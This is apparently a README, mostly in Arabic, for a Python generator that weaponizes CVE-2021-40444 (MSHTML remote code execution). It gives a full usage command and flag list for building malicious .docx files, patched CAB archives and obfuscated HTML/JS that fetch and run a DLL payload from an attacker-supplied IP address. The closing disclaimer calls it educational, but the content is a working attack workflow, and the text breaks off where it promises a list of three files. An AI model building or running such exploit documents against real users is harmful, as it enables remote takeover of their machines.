
مولد استغلال مبني على بايثون لـ CVE-2021-40444 (MSHTML RCE) مع تسليم حمولة مدفوعة بالقوالب عبر مستندات Office ضارة وأرشيفات CAB واستدعاءات HTML/JS مبهمة.
تأكد من تشغيل setup.sh أولاً لأنك ستحتاج إلى بعض المجلدات. بعد تشغيل السكريبت، يجب أن تكون قادرًا على تشغيل gen.py باستخدام المثال التالي:-
# Usage
python3 gen.py -d document/Sample.docx -p payload/payload.dll -i "http://10.10.10.10" -t html/template.html -c payload.cab -f nothing.inf -r Sample2.docx -obf 3
# Flag
-d -> Our .docx file that already been modified with Bitmap Object whether in header, document or footer
-i -> IP Address
-p -> Payload (.dll)
-t -> HTML File with Javascript
-r -> Rename the output of modified .docx
-c -> Rename the output of patched .cab
-f -> Rename the output of .inf
-obf -> Extra : Comes with 3 mode (HTML Entity, UTF-16BE or Both)
-v -> Increase output verbosity
http.server في مجلد web. سيحتوي هذا المجلد على 3 ملفات:-

هذا المستودع مخصص للأغراض التعليمية فقط وليس المقصود استخدامه في الخارج بنية سيئة. أي استخدام غير قانوني لهذا المستودع يتحمل المستخدم مسؤوليته ومخاطره بالكامل.